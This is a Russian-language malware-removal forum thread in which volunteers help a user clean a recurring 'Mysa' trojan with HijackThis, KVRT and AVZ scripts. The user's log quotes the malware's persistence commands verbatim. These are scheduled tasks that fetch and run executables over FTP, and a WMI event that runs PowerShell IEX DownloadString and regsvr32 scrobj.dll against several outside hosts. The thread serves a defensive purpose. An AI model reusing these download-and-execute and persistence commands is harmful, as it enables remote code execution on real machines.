• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена Троян mysa 1,2,3 + ok

Статус
В этой теме нельзя размещать новые ответы.

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
Пробовал удалить через drweb cureit
потом чистил hijack пункты:
O17 - DHCP DNS 1: 10.100.100.100
O17 - HKLM\System\CCS\Services\Tcpip\..\{65A2DA80-8006-4A90-B603-FA6956DA627D}: [NameServer] = 10.100.100.100
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Удалял сами файлы по путям, вирус всё равно восстанавливается.
 

Вложения

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
5,870
Реакции
1,957
Баллы
643
Пролечите систему с помощью KVRT. После этого папку C:\KVRT\Reports упакуйте в архив и прикрепите к следующему сообщению.
Соберите и прикрепите свежий CollectionLog Автологером.
 

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Баллы
3
Пролечите систему с помощью KVRT. После этого папку C:\KVRT\Reports упакуйте в архив и прикрепите к следующему сообщению.
Соберите и прикрепите свежий CollectionLog Автологером.
Я Вас опередил, предыдущий лог Автологера, сделан уже после лечения KVRT.
Лог с KVRT прикрепил.
 

Вложения

akok

Команда форума
Администратор
Сообщения
18,362
Реакции
13,817
Баллы
2,203
Тогда посмотрим на состояние после скрипта
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\inf\aspnet\lsma12.exe', '');
 QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
 QuarantineFile('C:\Windows\tasksche.exe', '');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '64');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '64');
 DeleteFile('C:\WINDOWS\mssecsvr.exe', '64');
 DeleteFile('C:\Windows\tasksche.exe', '32');
 DeleteService('mssecsvc2.0');
 DeleteService('mssecsvc2.1');
 DeleteSchedulerTask('oka');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4-32 - HKLM\..\RunOnce: [{6E23A13F-30F6-4C3F-BE45-2DEE1967F47A}] = C:\Users\Администратор\AppData\Local\Temp\{008ADB5C-D747-41DE-A454-38EAD161AA4B}\{6E23A13F-30F6-4C3F-BE45-2DEE1967F47A}.cmd
Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
5,870
Реакции
1,957
Баллы
643
Проблема решена?
 

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
5,870
Реакции
1,957
Баллы
643
Завершаем:
  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
 

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
5,870
Реакции
1,957
Баллы
643
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.0.9600.17843 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Автоматическое обновление отключено (-1)
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4530734 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
OpenOffice 4.1.3 v.4.13.9783 Внимание! Скачать обновления
-------------------------------- [ Arch ] ---------------------------------
WinRAR 4.20 (64-разрядная) v.4.20.0 Внимание! Скачать обновления
--------------------------------- [ SPY ] ---------------------------------
Radmin Server 3.5 v.3.50.0000 Внимание! Программа удаленного доступа!

Читайте Рекомендации после удаления вредоносного ПО
 
  • Like
Реакции: akok
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу